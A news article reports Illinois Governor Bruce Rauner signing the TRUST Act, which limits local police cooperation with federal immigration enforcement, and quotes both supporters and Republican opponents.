With mariachis performing in the background, Governor Bruce Rauner signed the TRUST Act on Monday, at a Mexican restaurant in Chicago’s Little Village neighborhood, officially barring cooperation between Illinois police departments and immigration officials.
The TRUST Act, valid in all cases except where a federal judge has issued a warrant for arrest, will make Illinois more welcoming to immigrants and refugees, according to its supporters.
The law denies local law enforcement the ability to detain people on behalf of Immigration and Customs Enforcement (ICE), the federal agency charged with identifying and investigating immigrants present in the country illegally. It also prohibits local officials from inquiring about a person’s immigration status, something Ruiz-Velasco called a “very important protection,” that will make immigrants more comfortable reporting crimes to local police.
“The TRUST Act will ensure that those who live in this state of limbo [as concerns immigration status] can have one certainty: When their lives and their families are in danger, they can turn to the police without their world being taken away from them,” said Serafina Ha, of the Korean immigrant services agency, the Hana Center.
Support for the law came from Illinois law enforcement functionaries, as well as over 170 faith leaders, and over 170 Illinois employers. The Campaign for a Welcoming Illinois, in support of the bill, engaged over 84 organizations and 14,000 people in the state, according to ICIRR.
However some political leaders, including many downstate Republicans, voiced opposition.
“We are a country founded by immigrants, but those were legal immigrants, and I think the last thing Illinois wants is to see a sanctuary state, and this moves us in that direction,” state Sen. Kyle McCarter, a Republican from Lebanon, Ill., told the Chicago Tribune.
Just five Republicans voted for the law in the Illinois Senate, and only one Republican voted for it in the House.
Passing with mainly Democratic support on May 5, 2017, the law had since sat on Governor Rauner’s desk as supporters organized through letters, press conferences and rallies.
“This will provide an unprecedented level of protection for Illinois’ half-million undocumented residents, who could otherwise enter the deportation pipeline through any simple interaction with police including a traffic violation,” ICIRR said in a statement. “Illinois is now the gold standard for statewide protections against deportation.”